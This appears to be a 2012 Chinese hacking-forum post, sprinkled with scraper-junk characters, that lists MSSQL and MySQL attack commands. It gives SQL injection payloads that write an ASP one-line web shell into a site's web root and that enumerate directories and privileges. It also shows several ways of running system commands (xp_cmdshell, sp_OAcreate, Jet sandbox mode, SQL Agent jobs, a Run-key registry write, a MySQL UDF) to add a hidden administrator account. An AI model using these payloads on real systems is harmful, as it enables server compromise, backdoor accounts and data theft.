找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3222|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
0 O2 T9 X* B( x' |6 L3 }首先确定网站的WEB路径7 B  ]9 }6 o; D
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马$ P1 q' f2 _5 R  j' @

& h/ M+ k4 }5 j1 x  r  l;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
+ k5 k+ p1 z- h1 w2 R//将一句话木马插入表中9 V: I$ e6 ^" I5 r% S
- r, J# a. P1 t, z: O/ O
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- . {5 V% Z1 E, x6 ^/ ]  r
//导出一个ASP文件
7 L! P8 m+ j3 s* r7 y" o3 Q7 |. n+ A5 E2 p3 M

$ l4 z, `+ U. ^1 W; y: |8 q( H关于MSSQL列目录$ E( ?2 g  a, D; |
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
& |& q! t! G  L: oInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
0 @- e4 x' T9 U$ ^) I6 l( ?) Y7 d5 c. {* ]  z0 l3 o0 n0 P
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
9 l1 T+ @, R5 q8 x  `  H  L+ J& L4 ~  s0 C' }! O
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段9 @; _) l) v6 E0 ]; _3 W; l* r7 `

) A' k- ~! V$ U2 g/ T2 L" u8 EAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
, ^( F# S3 x( y  O  i: c. p0 a3 W7 Y' u4 q/ M6 r

5 N9 _6 {! j2 l, s& ]# Q# `0 N数据库版本和权限查看3 U8 C! {2 ^1 `/ T6 i$ d, Y/ @9 f
and 1=(select @@VERSION) //查看详细的数据库信息.6 E1 [; b) G6 x( y6 C7 m, V1 Y- M
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA* s. G7 U' T0 c" N6 [4 g6 P
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER& _% ^1 R- B+ q# V* r

  }* M4 n2 n" U6 ]
# C9 m: T* J. L. \3 f' P1.利用xp_cmdshell执行命令# |  S9 O* I  b0 ]# B$ \
exec master..xp_cmdshell 'net user rfire 123456 /add'
$ O5 `/ g4 g; n8 R4 j: a4 `3 Q* ?exec master..xp_cmdshell 'net localgroup administrators rfire /add'
  B" v6 z6 s" O3 I6 H& ^/ `" m- n7 b; @9 O$ ?
恢复xp_cmdshell存储过程4 x% [6 @5 E* z! j- @+ t4 n
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 j0 t, ~+ k: g0 m7 B) \

3 l; o3 N9 }# v. g9 N: _( i
* L, Q  l) \8 _# {5 t2.利用SP_OAcreate和SP_OAMETHOD执行命令
* R* ]; N0 {0 f在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下( p6 a2 e2 r! q
DECLARE @shell INT //建立一个@shell实体5 u: [" ]# k# z1 H/ u" i
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
+ b: ?& D, F4 D0 R( G+ nEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
+ U8 H# b" w! n1 j+ N- S
6 q  i  v( j, x6 k$ |7 k
- H' ~* }$ m$ ~' C6 X. @; d3.利用沙盒模式
: Q: q* }. |' G6 Z先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
3 c) ^4 X. F+ `% ~6 b9 v" |开启沙盒模式:
6 O" x0 g: f) N8 jEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0% d/ B  x1 v  V
$ H& W/ L6 Q( {5 V0 y
执行命令:
- [  \" i+ J7 ], |6 e7 s- ]6 oSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
+ X+ R% _2 y- z( ]9 O' [9 H# E$ A- e2 L3 d% S% R# G+ N
3 O, E( U9 \9 u7 S' e4 e
4.利用SQL代理执行命令/ b0 p* o4 D" l/ T8 s
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
) d! Z" J$ I% d! {+ f
) j8 {( w; U5 Z  y. G执行命令:
  W: _  H) ^4 n" n8 `3 I5 juse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
$ D4 u9 V& n- mexec sp_add_job 'x'
7 V( ]+ P' a6 b& r" _exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业! d( S+ b' K* y. j* `, v% K
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
5 H; M3 l3 H4 N$ Z; p
+ i; d' x) f  L  B) H% |' y' L  _. h) p5 F! h+ M% ~9 d
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)/ G7 l3 c5 ^( R6 ^& s/ e. W3 e
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'" [2 W, v! G" g# J( d- c  F4 x

: o6 m$ V, q4 S2 ^6 C, e) n1 b. u9 x' j4 o+ c/ R# B: L
6.MYSQL的命令执行
9 O" \  Y2 V. L0 c4 x$ p& v% c. bMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
9 B+ t6 W2 U: v  \首先要在su.php下导出c:\windows\udf.dll
; P) f$ F; M1 H9 k" H) N9 y导出后执行创建自定义函数命令:
- r4 S% D9 M2 |Create Function cmdshell returns string soname 'udf.dll'1 [: q+ i6 n/ Q3 p$ m. E
执行命令" `) q, z6 z1 n  p5 |' M
select cmdshell('net user rfire 123456 /add')
( {' @* ?% [3 M7 d! l! p7 N2 g) a执行后删除函数 drop function cmdshell3 s- ]# _9 X+ P+ \4 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表